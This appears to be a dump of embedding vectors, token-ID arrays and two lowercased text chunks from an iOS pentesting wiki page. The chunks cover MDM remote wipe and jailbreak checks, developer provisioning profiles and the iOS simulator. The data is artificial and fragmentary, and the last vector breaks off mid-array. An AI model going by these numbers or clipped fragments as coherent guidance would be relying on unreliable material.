-0.06459014862775803, 0.2816886305809021, 0.5587753057479858, -0.5274837613105774, 0.5984442234039307, 0.9213831424713135, -0.40458279848098755, 0.3664323091506958, -0.18025700747966766, 0.44325387477874756, 0.018546326085925102, -0.09757692366838455, 0.4494754672050476, 0.20668627321720123, -0.45800113677978516, -0.36733028292655945, -0.2402918040752411, 0.2629089057445526, -0.6737306118011475, 0.517081618309021, 0.2964353859424591, -0.5279300212860107, 0.6228788495063782, -0.8260316252708435, 1.0342837572097778, -0.20087553560733795, 0.02250828966498375, -0.6009787321090698, 0.20108039677143097, -0.8065481185913086, -0.522064208984375, 0.38922765851020813, -0.6202223896980286, 0.13109996914863586, -0.04511245712637901, 0.4002823829650879, -0.7617541551589966, -0.4181669354438782, -0.25445130467414856, -0.787866473197937, 0.295665979385376, 1.1559799909591675, 0.023923637345433235, -0.18029966950416565, -0.44271817803382874, 0.4340893626213074, 0.15516963601112366, 0.448263943195343, 0.3426740765571594, 0.011350908316671848, -0.10810205340385437, -0.024126172065734863 ]
[ 2060, 9859, 2107, 2004, 2740, 23615, 1010, 1996, 5310, 2038, 2000, 2022, 2356, 2005, 6656, 1010, 3568, 2009, 2003, 2025, 2438, 2000, 5587, 1996, 4372, 3775, 24007, 2015, 1010, 2569, 6309, 1998, 7817, 2031, 2000, 2022, 2794, 2000, 1996, 18558, 1012, 20228, 2923, 5371, 1997, 1996, 10439, 1012, 7863, 1011, 1039, 1998, 9170, 24078, 16429, 20614, 6024, 1011, 1039, 2038, 1037, 8790, 2448, 7292, 1010, 2061, 2043, 2019, 7863, 1011, 1039, 2565, 2003, 6472, 1999, 16380, 1010, 2009, 4455, 8860, 3005, 4769, 2024, 10395, 2012, 2448, 7292, 2011, 13599, 1996, 2171, 1997, 1996, 3853, 2741, 1999, 1996, 4471, 2114, 1037, 2862, 1997, 2035, 1996, 3853, 3415, 2800, 1012, 2012, 1996, 2927, 1010, 2069, 18726, 2580, 2011, 6207, 2448, 1996, 18059, 2015, 1010, 2061, 2027, 2018, 3229, 2000, 2673, 2004, 2027, 2020, 9480, 1012, 2174, 1010, 2043, 6207, 3039, 2353, 2283, 5097, 1010, 6207, 2074, 3718, 1996, 20346, 2015, 6764, 1997, 1996, 3928, 4972, 2000, 1000, 5342, 1000, 2068, 2000, 9797, 1012, 2174, 1010, 9797, 2179, 2008, 1000, 3647, 1000, 4972, 2734, 1037, 2261, 1997, 2122, 25672, 24894, 14088, 4972, 1998, 2074, 4526, 1037, 7661, 20346, 5371, 2007, 1996, 3415, 1997, 1996, 25672, 24894, 14088, 4972, 1010, 2009, 2001, 2825, 2000, 1999, 6767, 3489, 2023, 3928, 5023, 4972, 1012, 2941, 1010, 6207, 1010, 2077, 4352, 2019, 10439, 2000, 2022, 2405, 1010, 4638, 2065, 1996, 10439, 4455, 2151, 1997, 2122, 10890, 4972, 1012, 2059, 1010, 9170, 2596, 1012, 2004, 9170, 2003, 10763, 3973, 5391, 1006, 2009, 2987, 1005, 1056, 10663, 1996, 4769, 1997, 1996, 4972, 1999, 2448, 7292, 2066, 7863, 1011, 1039, 1007, 1010, 2009, 2064, 2022, 7039, 2062, 4089, 1996, 4455, 1037, 9170, 2565, 2003, 2183, 2000, 2191, 3081, 10763, 3642, 4106, 1012, 5080, 2968, 19699, 5358, 16380, 2544, 1020, 1010, 2045, 2003, 2328, 1011, 1999, 2490, 2005, 5080, 2968, 10673, 2007, 2986, 8982, 7711, 2008, 4473, 2019, 5502, 2000, 2491, 1996, 5971, 6207, 5733, 1012, 1996, 4372, 13153, 3672, 2064, 2022, 7531, 2011, 1996, 5310, 23658, 2019, 4005, 1999, 2344, 2000, 3229, 1996, 5971, 18726, 1012, 1999, 2023, 2553, 1996, 5080, 2788, 7460, 2000, 1996, 5310, 1012, 2030, 1996, 2194, 2064, 5769, 1996, 7642, 3616, 1997, 1996, 4149, 5733, 2030, 1996, 5309, 2344, 8909, 1998, 20648, 1996, 9108, 2213, 6337, 2000, 16500, 2006, 2216, 5733, 1012, 3602, 2008, 6207, 2987, 1005, 1056, 3499, 2000, 4372, 13153, 1037, 3327, 5080, 2023, 2126, 3807, 1012, 2320, 1996, 2034, 6337, 2003, 17159, 1996, 5310, 3791, 2000, 2507, 9619, 2000, 16500, 2178, 2028, 1012, 1996, 5310, 2064, 2156, 1996, 5361, 6043, 1999, 10906, 1011, 1011, 1028, 2236, 1011, 1011, 1028, 6337, 1998, 5080, 2968, 3022, 2122, 9108, 2213, 6043, 2024, 9361, 1998, 14879, 2060, 5097, 1010, 2027, 2024, 2770, 2007, 2062, 14310, 1012, 1037, 9108, 2213, 3343, 2064, 16306, 5198, 2000, 2031, 1037, 3413, 16044, 2275, 2007, 1037, 7163, 23041, 20786, 11619, 1012, 1996, 17879, 2024, 5079, 2000, 1996, 5080, 3593, 1010, 2772, 1998, 4372, 26775, 22571, 3064, 2011, 1996, 9108, 2213, 8241, 1998, 17214, 4842, 6947, 1012, 2027, 3685, 2022, 3718, 2302, 3974, 2035, 1996, 5971, 2951, 1012, 9108, 2213, 17879, 3499, 2000, 13387, 2035 ]
hack_tricks
430.txt
6
the data if there are x failed password attempts. also, the admin can remote wipe the iphone whenever via the mdm interface. mdm agents will check also for possible jailbreaks of the device, as this is very dangerous state for an iphone. [SEP]
[ -0.5396115779876709, -0.48130300641059875, -0.153081476688385, 0.41189220547676086, 0.016698304563760757, -0.2816016972064972, -0.26250454783439636, -0.0053307069465518, 0.35969072580337524, 1.2085806131362915, 0.21671022474765778, 0.08405664563179016, -0.28916800022125244, -0.4257890582084656, -0.8272935152053833, -0.8661747574806213, -0.7234867811203003, -0.16493883728981018, 0.32553330063819885, -0.3016960322856903, 1.0658769607543945, 0.46794965863227844, -0.9762362241744995, -0.22264058887958527, -0.6660296320915222, -0.03376176953315735, 0.5924720764160156, 0.06608878076076508, 0.769833505153656, 1.5078681707382202, -0.7786791324615479, 0.22024856507778168, 0.2995668947696686, -0.44726547598838806, -0.4548596441745758, -0.2984348237514496, 0.6479288339614868, -0.7954949140548706, -0.5621073842048645, -0.7050904035568237, -0.2562251091003418, 0.6766014695167542, 0.8085310459136963, -0.6418008208274841, -0.871482789516449, -0.22939032316207886, -1.0579133033752441, 0.17623743414878845, -0.6522883176803589, 0.2279963195323944, -0.12014847248792648, 0.47123298048973083, -0.06112818792462349, -0.18535758554935455, 0.7138366103172302, -0.27934378385543823, -0.09016066789627075, -0.012656409293413162, 0.26458144187927246, 0.3172864615917206, 0.06994964182376862, 0.22731131315231323, 0.25085556507110596, -1.0385887622833252, 0.513302743434906, 0.5386325716972351, -1.2470496892929077, -0.6258099675178528, -0.49339669942855835, -0.5443493723869324, 1.1057379245758057, 0.42712754011154175, -0.34705033898353577, -0.9372814893722534, 0.03165551647543907, 0.3291917145252228, -0.37281179428100586, 0.525212824344635, 0.2232162058353424, 1.3666599988937378, 0.6001796126365662, 1.117154598236084, 0.2690050005912781, 0.47010377049446106, -0.2560224235057831, 0.7411974668502808, 0.3547808825969696, -0.2407393753528595, -0.12828660011291504, -0.8129872679710388, 0.3683831989765167, 0.7758833765983582, -0.3857894539833069, -0.29023388028144836, 0.614213764667511, 0.33835262060165405, -0.7730627059936523, 0.7987610101699829, 0.20356182754039764, 0.23483820259571075, 0.0390973724424839, -0.3086623251438141, -0.5486205816268921, 0.5694663524627686, -0.5612449049949646, 0.4024116098880768, 0.8948191404342651, -0.1077009066939354, -0.4446203112602234, -1.108219861984253, 0.6555673480033875, 0.08045848459005356, -0.09382089227437973, -0.17960131168365479, -0.11135083436965942, -0.0226453747600317, 0.9308305382728577, -0.15982842445373535, -0.15416522324085236, 0.36363911628723145, 0.6026948094367981, -0.034730587154626846, 0.2993290424346924, -0.7399035692214966, 0.6699918508529663, 0.39888232946395874, 0.19515946507453918, 0.8324325084686279, -0.335242360830307, -0.4654831886291504, -0.24811559915542603, -0.24726568162441254, 0.48066794872283936, 0.7673092484474182, -0.34966444969177246, -0.6455609202384949, 0.3491578698158264, 0.6220681667327881, 0.594416618347168, -0.3224213719367981, 0.31668636202812195, 0.10518385469913483, 0.6893138885498047, 1.1508369445800781, -0.16165576875209808, 0.04669945314526558, 0.221230611205101, -0.41284385323524475, -0.40613535046577454, 0.11488620191812515, 0.14353439211845398, 0.6528257131576538, -0.18474644422531128, -0.5833693742752075, 0.9308559894561768, 0.3270764648914337, 0.032977454364299774, 0.5419560670852661, -0.2994253933429718, 0.7676098346710205, 0.055026084184646606, 1.2457829713821411, -0.2447272092103958, 0.8171989917755127, -0.5685098767280579, -0.6700131893157959, 0.2226121574640274, -0.25810757279396057, -0.2258327156305313, -0.2115124762058258, 0.3606566786766052, -0.47927290201187134, -0.3326066732406616, 0.45965227484703064, 0.9268168210983276, 0.28022247552871704, 0.19246134161949158, 0.43175914883613586, 0.5227386355400085, 0.7571328282356262, -0.3131052851676941, -0.3165408968925476, 0.9321598410606384, 0.6823025345802307, -0.21503272652626038, 0.08613352477550507, 0.03828897327184677, -0.14269991219043732, -0.36673545837402344, -0.2722567915916443, 0.08808766305446625, -0.1636696308851242, -0.1305631399154663, -0.12787051498889923, 0.33152464032173157, -0.47927582263946533, -0.08426439017057419, -0.24936799705028534, 0.3776816129684448, -1.2454431056976318, -0.6025042533874512, 0.21174263954162598, -0.2073764204978943, 0.29494354128837585, 0.08051953464746475, -0.4131214916706085, 0.2805209457874298, 0.7067650556564331, -0.5329277515411377, 0.24714894592761993, 0.36456114053726196, 0.13449428975582123, -0.7712084054946899, -0.49624741077423096, -0.0036334958858788013, -0.02424795739352703, 0.7794948816299438, 0.4899204671382904, -0.24924221634864807, 0.12275782972574234, -0.6833426356315613, 0.3484817147254944, 0.19601574540138245, 0.16887980699539185, -0.5004560351371765, 0.12191342562437057, -0.19259589910507202, 0.7910130620002747, 0.16700290143489838, 0.02103321999311447, 0.29402780532836914, 0.40252992510795593, -0.2768439054489136, 1.2756614685058594, 0.6200867295265198, -0.18733656406402588, 0.11713644862174988, -0.26999253034591675, 0.01569254696369171, 0.2160818725824356, -0.11020146310329437, 0.2880189120769501, 0.3596341907978058, 0.1070057675242424, 0.4420927166938782, -0.12536269426345825, -0.3208433985710144, 0.21738043427467346, 0.5142137408256531, 0.6002301573753357, -0.4981676936149597, 0.8399172425270081, 1.0684514045715332, 0.24983468651771545, -1.0987799167633057, -0.13468733429908752, 0.32564160227775574, 0.6191499829292297, -1.421940565109253, -0.20645864307880402, -0.5553863644599915, 0.6503462791442871, -0.42042532563209534, 0.006101241800934076, 0.061143551021814346, 0.7514146566390991, 0.4972150921821594, 0.48314282298088074, -0.5528525710105896, -0.6118288040161133, -1.2375539541244507, -0.5087581276893616, -0.8355324864387512, -0.6836122870445251, -0.6390295028686523, 0.28260940313339233, -0.12551996111869812, -0.535467267036438, 0.19062942266464233, -1.368821382522583, 0.2526686191558838, 0.3102313280105591, 0.32577306032180786, 0.27405309677124023, -0.1395222544670105, 0.29660266637802124, -0.30689287185668945, 0.7035732865333557, -0.28718674182891846, -0.3264872133731842, 0.3110506534576416, -0.021650400012731552, -0.3237593472003937, -0.33493077754974365, 0.17803409695625305, -1.1122541427612305, 0.576305627822876, 0.40158936381340027, -0.5766735076904297, 0.33063605427742004, -0.7337243556976318, 0.17330363392829895, 0.24647565186023712, -0.276483952999115, -0.21939173340797424, 1.1561652421951294, 0.08410854637622833, -0.699947714805603, 0.4367583096027374, 0.5312937498092651, -0.47664976119995117, 0.5990840792655945, -0.20909954607486725, 0.5775357484817505, -0.519300639629364, 0.6574867367744446, 0.8518475890159607, -0.5159417390823364, -0.22689718008041382, 0.48283204436302185, -0.16991092264652252, -0.640190601348877, 0.12006916850805283, -0.38673675060272217, -0.6528510451316833, 0.10368110984563828, -0.49942076206207275, -1.3608301877975464, 0.13060081005096436, -1.0042486190795898, -0.07628466188907623, -0.37037861347198486, -0.1618059277534485, 0.8464261889457703, 0.5753821730613708, 0.5436949133872986, -0.4825980067253113, -0.35033249855041504, 0.2917982041835785, 1.5264254808425903, -0.4831414222717285, -0.3112877309322357, 0.4395884573459625, -0.02586398832499981, -0.412211537361145, 0.12277818471193314, -0.04012472182512283, -0.5306835770606995, 0.4214676320552826, 0.2701123356819153, 0.23401015996932983, -0.010444172658026218, -0.16702993214130402, 0.16923995316028595, 0.6613885164260864, 0.5043476223945618, -0.920254647731781, 0.12565773725509644, 0.6141995787620544, 0.19616170227527618, -0.08236586302518845, 0.4001690447330475, 0.155397430062294, 0.6238933801651001, 0.19229157269001007, -1.2642402648925781, -0.0070575145073235035, 1.2611819505691528, 0.8508758544921875, -0.4221042990684509, 0.4618189036846161, -0.5632501244544983, 0.13841958343982697, 0.448833167552948, -0.5098870992660522, -0.3244538903236389, 0.6913604736328125, 0.5850852727890015, 1.0621380805969238, -0.7302712202072144, 0.12747220695018768, -0.22052492201328278, -0.034438084810972214, -0.053532883524894714, 0.11244266480207443, -0.5850793123245239, -0.54976487159729, -0.7249969244003296, -0.5703425407409668, 0.21212419867515564, 0.6246272921562195, -0.18824663758277893, -0.7720638513565063, -0.7484323978424072, -1.0226829051971436, -1.0462173223495483, 0.6696039438247681, 0.13329337537288666, 0.6041488647460938, -0.127761110663414, 0.4841301441192627, 0.3866608738899231, 0.23555566370487213, -0.11477384716272354, -0.3398251235485077, -0.1794961541891098, -0.41757556796073914, 0.8938637971878052, -0.6659471988677979, -0.43381205201148987, -0.6531099081039429, 0.17371247708797455, 0.4540441632270813, -0.1264631599187851, -0.8108310103416443, 0.3967457711696625, -0.2136700302362442, 0.6193395853042603, -0.09189601987600327, 0.14379702508449554, -0.5863094925880432, 0.06322301179170609, -0.7251262664794922, 0.19435511529445648, 1.3731834888458252, -0.5311436057090759, 0.16073475778102875, -0.14613409340381622, 0.614773154258728, 0.7297395467758179, -0.2782892882823944, -0.27520132064819336, -0.3196478486061096, -0.7550083994865417, -0.8251698017120361, -0.3461712598800659, 1.0284152030944824, -0.5907197594642639, -0.20820990204811096, -0.5206352472305298, 0.11592300236225128, 0.8874428272247314, -0.6099168658256531, 0.1425739824771881, 0.06724580377340317, 0.41163161396980286, 0.6878851056098938, -0.16482096910476685, -0.28508350253105164, -0.11782930046319962, -0.5766651034355164, -0.7504519820213318, 0.28823211789131165, -0.9279923439025879, -0.3893960118293762, 0.1221618503332138, 0.7036164999008179, 0.32028329372406006, 0.5167649388313293, -0.14651474356651306, 0.4676203727722168, -0.1166001707315445, 0.9857949614524841, -0.5696306824684143, 0.104788638651371, -0.09359610080718994, -0.2370605766773224, -0.44360682368278503, 0.1145402044057846, -0.2137167602777481, 0.06721210479736328, -0.10093353688716888, -0.13013692200183868, -0.28200000524520874, 0.7698337435722351, -0.4719979763031006, 0.7485726475715637, 0.4711204469203949, -0.555804431438446, -0.33841726183891296, -1.047047734260559, 0.5180517435073853, 0.4951074421405792, 0.4327619671821594, -0.20501701533794403, -0.48700642585754395, -0.012437326833605766, 0.09511793404817581, -0.08918801695108414, 0.4928669333457947, 0.5315001606941223, 0.012279204092919827, -0.14208947122097015, 0.18591193854808807, -0.7694898843765259, 0.6853951811790466, -0.9273141026496887, -0.4346364140510559, 0.5642780065536499, -0.16302087903022766, 0.4545092284679413, 0.03265849128365517, -0.3199765980243683, 0.616997241973877, -0.0795382484793663, -0.17719878256320953, -0.7307196855545044, -0.13215447962284088, 0.03472726419568062, -0.20664064586162567, -0.16558900475502014, 0.3334946036338806, 0.5257464647293091, 0.8758392333984375, 1.145156741142273, -0.7503675818443298, 0.1487775444984436, -0.14482362568378448, -0.11073251813650131, 0.7870030403137207, 0.5700821876525879, -1.258445143699646, -0.15332743525505066, 0.4027239680290222, -0.39052942395210266, -0.010827953927218914, -0.1763685643672943, -1.1130446195602417, -0.735772430896759, 0.03311248496174812, 0.26353731751441956, -0.5877634286880493, -0.14264121651649475, -0.9569351077079773, -0.7664286494255066, -0.9971964359283447, 0.2977295517921448, 0.11584562063217163, -0.518501341342926, -0.05915972962975502, -0.035311613231897354, -0.012893835082650185, -0.7615746855735779, 0.006329802330583334, 0.7018582224845886, -0.5065575242042542, -0.8880034685134888, 0.898752748966217, -0.4260372817516327, -0.7672191858291626, 0.10754987597465515, -0.2612677812576294, 0.06927772611379623, -0.4044528007507324, -0.590036928653717, -0.3668728470802307, -0.5398348569869995, 0.033754002302885056, -0.5606220364570618, 0.5404906868934631, -0.8027305603027344, 0.054727643728256226, 0.14418409764766693, 0.4374386668205261, -0.2696910798549652, 0.4658912718296051, -0.4961380362510681, 0.6738133430480957, 0.692628800868988, -0.6397706866264343, 0.16971462965011597, 0.3715933561325073, 0.3033079206943512, 0.26413196325302124, 0.7063663005828857, -0.941142737865448, 0.3373996317386627, -0.5781888961791992, -0.1941467523574829, -0.12826372683048248, 0.06994644552469254, 0.31195682287216187, -0.22897560894489288, -0.25111865997314453, -0.11203239113092422, -0.9405398368835449, -0.00557782594114542, 0.715674102306366, 0.2602580189704895, 0.20263369381427765, -0.13640516996383667, 0.4032914638519287, 0.5440278053283691, -0.7073879241943359, -0.34429240226745605, 0.3511248826980591, -0.05318957567214966, -0.34428465366363525, -0.3701082468032837, -0.4620778560638428, -0.6743736863136292, -0.3187357187271118, 0.9757924675941467, -0.1654912829399109, 0.15178360044956207, -0.41660740971565247, -0.4309331178665161, -0.10718344897031784, -0.053965143859386444, -0.7515402436256409, 0.9816544651985168, -0.10649692267179489, 0.06314826756715775, -0.6751075387001038, -0.5142409801483154, -0.3562481701374054, -0.20948682725429535, -0.10698922723531723, 0.3034278154373169, 0.6673084497451782, -0.3239400386810303, 1.002568006515503, 0.26573508977890015, -0.3367612063884735, -1.2822561264038086, 0.37195977568626404, 0.06612372398376465, -0.4603880047798157, -0.2917220890522003, 0.07073146104812622, -0.3288727402687073, -0.07509593665599823, 0.102925144135952, 0.300548791885376, 0.13006870448589325, 0.33159589767456055, -0.6077758073806763, 0.31266677379608154, -0.42042115330696106, -0.48241615295410156, 0.7866114377975464, -0.22060483694076538, -0.46626749634742737, -1.5733368396759033, 0.033406198024749756, 0.34304603934288025, 0.19893713295459747, 0.39410829544067383, 0.45926541090011597, 0.05190278962254524, 0.5039376616477966, -0.36259591579437256, 1.042625069618225, 0.31296584010124207, 0.367468923330307, 0.5875232815742493, -0.3650463819503784, -0.9530130624771118, 0.200727179646492, 0.0609443262219429, 0.14607618749141693, -0.017945686355233192, -0.4823521375656128, 1.0417031049728394, -0.15575052797794342, 0.8207405209541321, -0.24797821044921875, -0.0553826168179512, -0.3254726529121399, -0.13460767269134521, 0.2121036797761917, -0.1991947889328003, -0.8045529127120972, -0.31417664885520935, 0.3439832031726837, 0.2980384826660156, 0.3271576166152954, -0.3948839604854584, 0.3578396737575531, -0.3276205360889435, 0.39111635088920593, -0.17274004220962524, -0.08633141219615936, -0.4383145570755005, -0.7167161107063293, -0.5852722525596619, -0.03297379985451698, -0.7070655822753906, -1.1576106548309326, -0.20471929013729095, -0.27247607707977295, -0.01960172690451145, 0.829038679599762, -0.7565651535987854, 0.5543471574783325, -0.1966364085674286, -0.08242426067590714, 0.9262622594833374, -0.08396799117326736, -0.04720541089773178, 0.2258806824684143, 0.6335263252258301, 0.28739747405052185, 1.046506404876709, -0.5695759654045105, 0.9144948720932007, -0.16888482868671417, -0.3268812894821167, 0.4188462197780609, -0.3414342999458313, -0.1959364265203476, 0.273095965385437, -0.70530104637146, -0.6706740856170654, 0.40391644835472107, -0.6446580290794373, -0.4218124747276306, 0.16765500605106354, -0.03496992588043213, 0.1537759006023407, -0.24362985789775848, -0.2167985588312149, 0.3153986632823944, 0.07484137266874313, -0.1416802704334259, 0.248417928814888, 0.15682284533977509, 0.641446053981781, -0.06635521352291107, -0.44212648272514343, -0.42235901951789856, -0.3426288664340973, -0.4845010042190552, 0.4323787987232208, -0.14110107719898224, -0.4778575003147125, -0.5638983249664307, -0.1551976501941681, 0.09928742051124573, 0.1785513460636139, -0.005514202173799276, 0.6976072192192078, 1.1706523895263672, -0.00392179423943162, 0.20211578905582428, -0.343139111995697, 0.1449267566204071, -1.2548850774765015, -0.18799681961536407, 0.4007590115070343, 0.17646735906600952, -0.8086983561515808, -0.5975398421287537, -0.540720522403717, 0.2662644684314728, -0.15335142612457275, 0.3182013928890228, -0.33220934867858887, -0.12812143564224243, 0.3437190651893616, 0.7592803239822388, -0.0567588284611702, -0.3019651472568512, -0.20409423112869263, 0.5401514172554016, -0.21708351373672485, -1.0284544229507446, 0.32407045364379883, 0.9782159924507141, -0.19641663134098053, -0.13661932945251465, -0.5722770690917969, -0.04393821954727173, 0.516139805316925, -0.1847471296787262, -0.04393620043992996, 0.06261154264211655, -1.0509679317474365, 1.0778030157089233, -0.04313110560178757, 0.5952727198600769, 0.16879713535308838, 0.017832426354289055, -0.08325189352035522, -0.4299449920654297, -0.7188383936882019, -0.40491053462028503, -0.024006661027669907, -0.5962058901786804, 0.2998903691768646, 1.168899416923523, 0.7832395434379578, -0.40639403462409973, 0.19390037655830383, 0.014290569350123405, 0.769919753074646, 0.9304056167602539, -0.18850329518318176, -0.27357959747314453, 0.5117743611335754, 1.0719003677368164, -0.7791069746017456, -0.033355463296175, 0.06997986882925034, -0.41831710934638977, -0.6030415892601013, -0.19332797825336456, -0.17654114961624146, 0.6104176640510559, 0.2607710063457489, 0.15089468657970428, -0.22590689361095428, -0.0290949996560812, 0.7412962913513184, -0.073885478079319, 0.18010209500789642, 0.7874749302864075, -0.933976411819458, -0.060368530452251434, -0.09552604705095291, -0.08269446343183517, -0.2774582803249359, 0.166723370552063, -0.6678003668785095, -0.9122737050056458, 1.2060465812683105, 0.4650919437408447, 0.14116153120994568, 0.5200604200363159, 0.4176710247993469, -0.7700701951980591, -0.44563984870910645, 0.7649150490760803, -0.9461644887924194, 0.14118969440460205, -0.2411075085401535, -0.354530394077301, -0.8037304282188416, 0.0188845656812191, -0.092268206179142, -0.733275830745697, -0.24368372559547424, -0.22522270679473877, 0.36211779713630676, -1.0958651304244995, 0.1304679960012436, -0.8813746571540833, -1.1309781074523926, 0.5662967562675476, 0.21378543972969055, -0.5022913813591003, -0.316592812538147, -0.7275821566581726, 0.19010569155216217, 0.5328256487846375, 0.19825872778892517, 0.8090190887451172, 1.3744921684265137, 0.4130508005619049, -0.8057594895362854, 0.2322777956724167, 0.34528982639312744, -0.26839539408683777, 0.45231229066848755, -0.872137725353241, 0.1443839967250824, 0.12416213005781174, -0.2722247838973999, -0.6103894114494324, -0.10196785628795624, 0.23315457999706268, -0.34298256039619446, -0.8256783485412598, 0.25517570972442627, 0.49604716897010803, -0.4743286073207855, 0.30315691232681274, -0.2735634744167328, -0.08619128167629242, 0.5193364024162292, -0.4014124274253845, 0.26730528473854065, -0.36165717244148254, 0.48458683490753174, -0.8071295022964478, 0.3139175474643707, 0.2211104929447174, -0.20189963281154633, -0.278093546628952, -0.7189121246337891, 0.3478224277496338, -0.5659403204917908, -0.8621849417686462, 0.7252666354179382, 0.8946644067764282, 0.1342502236366272, 1.0108205080032349, 0.4596114158630371, -0.5110955238342285, 0.2244158387184143, 0.555780291557312, 0.4161151945590973, -0.4002109169960022, 1.3349987268447876, 0.28837326169013977, -0.07832930237054825, -0.09983270615339279, 0.32142242789268494, 0.6082461476325989, -0.433228462934494, 0.3427684009075165, 0.24663297832012177, -0.25939950346946716, -1.211124062538147, -0.543229877948761, 0.08155126124620438, 0.9897873401641846, -0.22699394822120667, -0.6462268829345703, -0.11853081732988358, -0.09911293536424637, -1.2706377506256104, 0.5297305583953857, -0.13184353709220886, 0.5124043226242065, 0.3802857995033264, -0.027741989120841026, -0.2929527163505554, -1.2596286535263062, 4.02577543258667, 0.6097573637962341, -0.3337417542934418, -0.009013914503157139, 0.399513840675354, 0.7582242488861084, 0.5377586483955383, 0.02527392841875553, 0.33670327067375183, -0.45703545212745667, 0.4891557991504669, -0.3113242983818054, 0.05644602328538895, 0.1352439969778061, 0.05987972021102905, 0.11638757586479187, 0.17727398872375488, 0.3317684531211853, 0.17713910341262817, -0.7035192847251892, -0.9377220273017883, 0.41382139921188354, 0.4274464249610901, 1.0562492609024048, -0.14295846223831177, 0.4374538064002991, 0.6795055866241455, 0.046734102070331573, -0.493496835231781, -0.38174739480018616, 0.8575649261474609, -0.9546672105789185, 0.3499740660190582, -0.6646879315376282, -0.27636268734931946, 0.6266492009162903, 0.6166329383850098, 0.02360001765191555, -0.2075609415769577, -0.2565441429615021, -0.02508644014596939, -0.15787678956985474, 0.1818978190422058, -0.44886183738708496, -0.043092139065265656, 0.7817676067352295, -0.34305810928344727, 0.15714071691036224, 1.1367493867874146, -0.34521549940109253, 0.5589689612388611, -1.025646686553955, 0.4080830216407776, 0.2923874855041504, -0.7392458915710449, 0.27033063769340515, 0.008503601886332035, -0.5509766936302185, 0.6518761515617371, -0.886269748210907, 0.21697485446929932, -0.3583669662475586, -0.37989065051078796, 0.5018728971481323, -0.2252311408519745, 0.8348398804664612, -0.2902562618255615, 0.32406479120254517, -0.24361084401607513, -0.2804889976978302, 0.2857409119606018, -0.04472476989030838, -0.6957975625991821, -0.8807421922683716, -0.2091895490884781, 0.19976328313350677, 0.597768247127533, 1.0936803817749023, -0.35346800088882446, -0.544705867767334, -0.1331934779882431, 0.15505896508693695, 0.09325706958770752, -0.7304427623748779, 0.4698314964771271, 0.1341315358877182, -0.15464267134666443, -0.189817875623703, 0.11667117476463318, 0.41379594802856445, 0.5751084089279175, 0.0419747419655323, -0.6226615309715271, -0.39169803261756897, 0.15573467314243317 ]
[ 1996, 2951, 2065, 2045, 2024, 1060, 3478, 20786, 4740, 1012, 2036, 1010, 1996, 4748, 10020, 2064, 6556, 13387, 1996, 18059, 7188, 3081, 1996, 9108, 2213, 8278, 1012, 9108, 2213, 6074, 2097, 4638, 2036, 2005, 2825, 7173, 23890, 2015, 1997, 1996, 5080, 1010, 2004, 2023, 2003, 2200, 4795, 2110, 2005, 2019, 18059, 1012, 102 ]
hack_tricks
430.txt
7
[CLS] ios testing environmentapple developer programa provisioning identity is a collection of public and private keys that are associated an apple developer account. in order to sign apps you need to pay 99 $ / year to register in the apple developer program to get your provisioning identity. without this you won't be able to run applications from the source code in a physical device. another option to do this is to use a jailbroken device. starting in xcode 7. 2 apple has provided an option to create a free ios development provisioning profile that allows to write and test your application on a real iphone. go to xcode - - > preferences - - > accounts - - > + ( add new appli id you your credentials ) - - > click on the apple id created - - > manage certificates - - > + ( apple development ) - - > done _ _ then, in order to run your application in your iphone you need first to indicate the iphone to trust the computer. then, you can try to run the application in the mobile from xcode, but and error will appear. so go to settings - - > general - - > profiles and device management - - > select the untrusted profile and click " trust ". note that applications signed by the same signing certificate can share resources on a secure manner, like keychain items. the provisioning profiles are stored inside the phone in / library / mobiledevice / provisioningprofilessimulatornote that a simulator isn't the same as en emulator. the simulator just simulates the behaviour of the device and functions but don't actually use them. the ios sdk simulator offers a higher - level simulation of an ios device. most importantly, emulator binaries are compiled to x86 code instead of arm code. apps compiled for a real device don't run, making the simulator useless for black box analysis and reverse engineering. simulatorthe first thing you need to know is that performing a pentest inside a simulator will much more limited than doing it in a jailbroken device. all the tools required to build and support an ios app are only officially supported on mac os. apple's de facto tool for creating / debugging / instrumenting ios applications is xcode. it can be used to download other components such as simulators and different sdk versions required to build and test your app. it's highly recommended to download xcode from the official app store. other versions may be carrying malware. the simulator files can be found
[ 0.20514318346977234, -0.07291102409362793, -0.4801039397716522, -0.00120195047929883, -0.17083555459976196, -0.3551699221134186, 0.08747539669275284, 0.08642259240150452, 0.26987361907958984, 0.49246352910995483, -0.036923184990882874, -0.10920973867177963, 0.5938728451728821, -0.9985374808311462, -0.250265896320343, -0.4243873357772827, -0.5088808536529541, -0.009316051378846169, -0.9005864858627319, 0.005300200078636408, -0.3889565169811249, 0.3224064111709595, -0.7826760411262512, -1.2187323570251465, -0.41932034492492676, 0.917317807674408, 0.5282951593399048, 0.19576431810855865, 0.03433537855744362, 0.40736839175224304, -0.2606040835380554, 0.16860896348953247, -0.3343229591846466, -0.38627249002456665, 0.2300315648317337, -0.7025704979896545, 0.9176881909370422, -0.5697168111801147, -0.05742818862199783, -0.3484109342098236, 0.5054605007171631, -0.7953796982765198, -0.3900910019874573, -0.025142120197415352, -0.11254478991031647, -1.3782612085342407, 0.25371259450912476, -0.501752495765686, -0.05493670329451561, 0.28019386529922485, 0.5273899435997009, 0.155925914645195, -0.30815786123275757, -0.11730469018220901, -0.13929666578769684, 0.024420496076345444, 0.4241648316383362, -0.17146578431129456, -0.7867211103439331, 0.46602585911750793, -0.3032381236553192, 0.2852351665496826, 0.37653791904449463, -0.800722599029541, 0.2550158202648163, 0.1482570767402649, -0.14322753250598907, 0.11933865398168564, -0.49180835485458374, -0.40407437086105347, -0.39278024435043335, 0.7446253299713135, -0.788957417011261, -0.6147473454475403, -0.41679084300994873, -0.24385403096675873, 0.34232649207115173, -0.8689560294151306, -0.14997684955596924, 0.5432853102684021, 0.10204293578863144, 0.7089794874191284, 0.19044798612594604, -0.10947101563215256, -0.660560131072998, 0.16247914731502533, 0.5131644606590271, -0.23603639006614685, -0.3159935474395752, -0.5714917182922363, 0.12603649497032166, 0.1546497941017151, -1.0709716081619263, 0.11089307814836502, 0.4801254868507385, 1.0263361930847168, -0.4690189063549042, 0.004382837098091841, 0.18314705789089203, 0.046523939818143845, 1.0834089517593384, 0.5729631781578064, 0.009116197004914284, 0.43794846534729004, -0.45617786049842834, 0.7529036998748779, 0.3497190475463867, -0.22782018780708313, -0.1752832531929016, -0.5312706232070923, 0.5060814619064331, -0.021196892485022545, 0.5127946734428406, -0.2567223906517029, -0.11953339725732803, 0.027989160269498825, 0.6520650386810303, 0.3180042803287506, -0.8091506361961365, 0.35639673471450806, 0.1853010654449463, -0.07428030669689178, 0.2731025218963623, -0.46511900424957275, 